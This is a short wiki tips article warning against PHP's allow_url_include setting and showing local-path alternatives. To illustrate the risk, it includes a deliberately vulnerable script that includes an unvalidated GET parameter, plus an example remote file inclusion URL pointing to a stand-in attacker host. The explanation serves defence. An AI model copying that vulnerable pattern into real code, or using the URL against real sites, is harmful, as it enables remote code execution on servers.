Jolt Wiki

Have a Question?

If you have any question you can ask below or enter what you are looking for!

Security Risks Involved with allow_url_include

19 Dec, 2012 Tips and Tricks 0 Comments

The Php option allow_url_include permits the inclusion of a remote Php code (executed through local server) using URL. Do not attempt to use this feature for security reasons. If you are considering installing web software that requires this feature, never install such a software. It is recommended that you look for an alternative.

Here are the reasons for avoiding allow_url_include:

  • The app may be deceived into including and, in some cases executing, custom content from a remote Uniform Resource Locator so hackers can force your app to run the random code
  • If your PHP scripts include URL content, the web server must initiate additional HTTP requests to generate the page which will load very slowly.
  • Your website will not display correctly if the web server you are loading content from fails to respond.
  • In general, you can include content directly from a domain you are hosting. Alternately, you can load the content without evaluating it as PHP.

Server-Side Includes (SSI)

For instance, you are working on domain.tld and your software has the following directive:

<?php
include("http://domain.tld/includes/code_to_include.php");
?>

If you set allow_include to off, the method mentioned above will not function. Rather, you will need to include the file with a local path.

  1. Use a relative path. 
    ../includes/code_to_include.php
  2. Use an absolute path. 
    /home/user/domain.tld/includes/code_to_include.php
  3. Use a Php environment variable. 
    $_SERVER['DOCUMENT_ROOT']

    This will restore the absolute path to the web directory, e.g.:

<?php
include($_SERVER['DOCUMENT_ROOT']."/includes/code_to_include.php");
?>

Consequence of Enabling allow_url_include

The following is a standard script.

<?php
$page = ($_GET['page']) ? $_GET['page'] : "index.php";
?>
<html>
  <head>
    <title>This is EVIL</title>
  </head>
  <body>

...anything here...

<?php include($page); ?>

...anything here...

  </body>
</html>

You can change the page content by adding a query string to the URL, such as this: (http://www.domain.tld/index.php?page=new_content.php)

If allow_url_include is enabled, you can change the variable in the query series, exploiting the page: http://www.domain.tld//index.php?page=http//hacker.com/evil_script.TXT

Leave a Reply

You must be logged in to post a comment.